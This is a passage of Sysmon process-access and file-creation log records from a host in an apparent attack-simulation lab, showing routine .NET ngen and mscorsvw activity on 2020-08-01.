C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:28.450","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FC-5F25-0000-001062791200}","TargetProcessId":"3320","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7995,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:28.528\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FC-5F25-0000-0010167D1200}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:28.528","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FC-5F25-0000-0010167D1200}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7996,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:28.528\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FC-5F25-0000-0010167D1200}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:28.528","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FC-5F25-0000-0010167D1200}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7997,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:28.528\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FC-5F25-0000-0010167D1200}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:28.528","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FC-5F25-0000-0010167D1200}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7998,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:29.231\r\nProcessGuid: {A837DB8D-04FC-5F25-0000-0010167D1200}\r\nProcessId: 2520\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9d8-0\\UIAutomationClientsideProviders.dll\r\nCreationUtcTime: 2020-08-01 06:00:29.231","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:29.231","ProcessGuid":"{A837DB8D-04FC-5F25-0000-0010167D1200}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\9d8-0\\UIAutomationClientsideProviders.dll","CreationUtcTime":"2020-08-01 06:00:29.231","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7999,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:29.293\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04FD-5F25-0000-001072811200}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:29.293","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04FD-5F25-0000-001072811200}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8000,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:29.293\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04FD-5F25-0000-001072811200}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:29.293","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04FD-5F25-0000-001072811200}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8001,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:29.293\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04FD-5F25-0000-001072811200}\r\nTargetProcessId: 4124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:29.293","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04FD-5F25-0000-001072811200}","TargetProcessId":"4124","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:29","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8002,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:29.340\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CE-5F25-0000-00102BE01000}\r\nTargetProcessId: 872\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:29.340","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CE-5F25-0000-00102BE01000}","TargetProcessId":"872","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
